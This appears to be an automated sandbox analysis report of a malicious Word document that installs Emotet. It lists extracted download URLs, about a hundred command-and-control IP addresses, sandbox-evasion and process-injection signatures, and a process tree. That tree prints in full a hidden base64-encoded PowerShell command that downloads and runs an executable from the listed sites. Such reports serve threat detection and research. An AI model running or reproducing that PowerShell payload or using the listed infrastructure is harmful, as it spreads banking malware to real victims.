Analysis
-
max time kernel
130s -
resource
win10v191014 -
submitted
09-12-2019 21:55
Task
task1
Sample
Docs_bb7395a685cc5b362335f533fc6f058e.24.doc
Resource
win7v191014
General
Malware Config
Extracted
http://mgn.becksworld.org/cgi-bin/qou-ctdaa-783206946/
http://glojef.hwtnetworks.com/cgi-bin/kewbuqy-7d9-286/
http://psikologimarketing.com/eikhx/QBMWeUC/
http://demo.woo-wa.com/wp-content/crDSizyuW/
http://www.icbasiglio.gov.it/wpgo/w7mfnu8-wk673a-9668696/
Extracted
emotet
24.27.122.202:80
67.171.182.231:80
190.171.135.235:80
103.9.145.19:8080
46.105.128.215:8080
172.105.213.30:80
69.30.205.162:7080
115.179.91.58:80
181.44.166.242:80
78.46.87.133:8080
81.213.145.45:443
83.156.88.159:80
210.111.160.220:80
195.191.107.67:80
192.241.220.183:8080
1.32.54.12:8080
192.161.190.171:8080
190.189.79.73:80
122.11.164.183:80
41.77.74.214:443
212.129.14.27:8080
162.144.46.90:8080
142.93.87.198:8080
201.196.15.79:990
83.110.107.243:443
77.245.12.212:80
211.218.105.101:80
187.250.92.82:80
193.33.38.208:443
85.109.190.235:443
192.210.217.94:8080
200.71.112.158:53
190.161.67.63:80
186.66.224.182:990
152.169.32.143:8080
41.218.118.66:80
45.129.121.222:443
72.69.99.47:80
85.105.183.228:443
191.100.24.201:50000
23.253.207.142:8080
216.75.37.196:8080
95.216.212.157:8080
113.52.135.33:7080
212.112.113.235:80
190.5.162.204:80
83.99.211.160:80
86.6.123.109:80
110.142.161.90:80
172.90.70.168:443
89.215.225.15:80
98.15.140.226:80
5.189.148.98:8080
187.233.220.93:443
188.230.134.205:80
181.47.235.26:993
82.79.244.92:80
189.61.200.9:443
221.154.59.110:80
67.254.196.78:443
210.224.65.117:80
198.57.217.170:8080
201.183.251.100:80
177.103.201.23:80
46.105.131.68:8080
192.163.221.191:8080
46.17.6.116:8080
81.82.247.216:80
178.134.1.238:80
176.58.93.123:80
181.197.108.171:443
187.177.155.123:990
190.101.87.170:80
186.215.101.106:80
119.159.150.176:443
174.57.150.13:8080
58.93.151.148:80
37.59.24.25:8080
91.117.31.181:80
95.216.207.86:7080
123.142.37.165:80
182.176.116.139:995
103.122.75.218:80
78.186.102.195:80
124.150.175.129:8080
143.95.101.72:8080
51.38.134.203:8080
138.197.140.163:8080
172.104.70.207:8080
189.225.211.171:443
124.150.175.133:80
24.28.178.71:80
60.53.3.153:8080
72.27.212.209:8080
163.172.97.112:8080
50.116.78.109:8080
Signatures
-
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
WINWORD.EXE565.exe565.exemethodstextto.exemethodstextto.exepid process 4992 WINWORD.EXE 4332 565.exe 4196 565.exe 4324 methodstextto.exe 3980 methodstextto.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
Powershell.exemethodstextto.exepid process 4740 Powershell.exe 3980 methodstextto.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4992 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
SppExtComObj.exePowershell.exe565.exemethodstextto.exedescription pid process target process PID 68 wrote to memory of 2212 68 SppExtComObj.exe SLUI.exe PID 4740 wrote to memory of 4332 4740 Powershell.exe 565.exe PID 4332 wrote to memory of 4196 4332 565.exe 565.exe PID 4324 wrote to memory of 3980 4324 methodstextto.exe methodstextto.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Drops file in System32 directory 6 IoCs
Processes:
565.exemethodstextto.exedescription ioc process File renamed C:\Users\Admin\565.exe => C:\Windows\SysWOW64\methodstextto.exe 565.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat methodstextto.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 methodstextto.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE methodstextto.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies methodstextto.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 methodstextto.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\Debug\ESE.TXT svchost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 4992 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4740 Powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
565.exe565.exemethodstextto.exemethodstextto.exepid process 4332 565.exe 4196 565.exe 4324 methodstextto.exe 3980 methodstextto.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
Processes:
565.exemethodstextto.exepid process 4196 565.exe 3980 methodstextto.exe -
Processes:
description ioc Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0" Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1" -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
Processes:
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_bb7395a685cc5b362335f533fc6f058e.24.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
PID:4992
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:68 -
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵PID:2212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABYAGwAbwBlAGEAYQB3AGkAdwA9ACcASwB3AGMAZgBoAHkAegB0AG0AZgAnADsAJABSAGsAYwB6AGMAdQBiAGkAcgBqACAAPQAgACcANQA2ADUAJwA7ACQATwBxAHoAeABjAGsAbwB4AGwAPQAnAFAAYgBxAHQAZABiAHEAcQBiAGEAJwA7ACQARABsAGcAYQBwAHUAdABlAHkAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFIAawBjAHoAYwB1AGIAaQByAGoAKwAnAC4AZQB4AGUAJwA7ACQAQQBvAHQAagBzAHEAZwBiAD0AJwBJAHAAagBiAHoAZgBtAGIAbgB6ACcAOwAkAEMAbQB6AGQAZgB2AHAAZABvAD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABOAEUAVAAuAHcARQBCAGMATABpAEUATgBUADsAJABXAHIAbgBoAGkAZwB4AHQAcwB5AGsAPQAnAGgAdAB0AHAAOgAvAC8AbQBnAG4ALgBiAGUAYwBrAHMAdwBvAHIAbABkAC4AbwByAGcALwBjAGcAaQAtAGIAaQBuAC8AcQBvAHUALQBjAHQAZABhAGEALQA3ADgAMwAyADAANgA5ADQANgAvACoAaAB0AHQAcAA6AC8ALwBnAGwAbwBqAGUAZgAuAGgAdwB0AG4AZQB0AHcAbwByAGsAcwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAGsAZQB3AGIAdQBxAHkALQA3AGQAOQAtADIAOAA2AC8AKgBoAHQAdABwADoALwAvAHAAcwBpAGsAbwBsAG8AZwBpAG0AYQByAGsAZQB0AGkAbgBnAC4AYwBvAG0ALwBlAGkAawBoAHgALwBRAEIATQBXAGUAVQBDAC8AKgBoAHQAdABwADoALwAvAGQAZQBtAG8ALgB3AG8AbwAtAHcAYQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGMAcgBEAFMAaQB6AHkAdQBXAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AaQBjAGIAYQBzAGkAZwBsAGkAbwAuAGcAbwB2AC4AaQB0AC8AdwBwAGcAbwAvAHcANwBtAGYAbgB1ADgALQB3AGsANgA3ADMAYQAtADkANgA2ADgANgA5ADYALwAnAC4AIgBzAFAAbABgAGkAVAAiACgAJwAqACcAKQA7ACQAUABnAGkAZwBwAGsAbwB5AGEAZwB4AG4APQAnAEoAYQB3AGcAZgBjAHoAZgB0AGEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFMAcQBxAHAAYwByAGUAdAAgAGkAbgAgACQAVwByAG4AaABpAGcAeAB0AHMAeQBrACkAewB0AHIAeQB7ACQAQwBtAHoAZABmAHYAcABkAG8ALgAiAEQAYABPAHcAYABOAGAATABPAGEARABGAGkAbABlACIAKAAkAFMAcQBxAHAAYwByAGUAdAAsACAAJABEAGwAZwBhAHAAdQB0AGUAeQApADsAJABCAGwAZAB6AG0AcwBsAGgAPQAnAEIAbQBhAHYAbgBrAGoAYgBzAHcAYgAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEQAbABnAGEAcAB1AHQAZQB5ACkALgAiAEwAYABFAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADIANgA5ADUAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AGEAYABSAFQAIgAoACQARABsAGcAYQBwAHUAdABlAHkAKQA7ACQARgBnAHUAcAB0AGsAbQBoAHcAbgA9ACcAVQBhAHQAZQBjAHIAagB3ACcAOwBiAHIAZQBhAGsAOwAkAEcAagBwAG8AdgByAGgAbgBhAGwAPQAnAFQAZwB5AHYAbgBvAGEAdABwAG4AbQBqACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEkAbwB0AGsAZwB6AGwAdgB6AGsAPQAnAE8AdgBhAGkAbQB4AG8AYwBoACcA1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:4740 -
C:\Users\Admin\565.exe"C:\Users\Admin\565.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4332 -
C:\Users\Admin\565.exe--1fe51a923⤵
- Suspicious use of SetWindowsHookEx
- Drops file in System32 directory
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
PID:4196
-
-
-
C:\Windows\SysWOW64\methodstextto.exe"C:\Windows\SysWOW64\methodstextto.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4324 -
C:\Windows\SysWOW64\methodstextto.exe--24eb9e702⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
PID:3980
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Drops file in Windows directory
PID:4232
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:2336
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DoSvc1⤵PID:4636
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup1⤵PID:3608
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc1⤵PID:444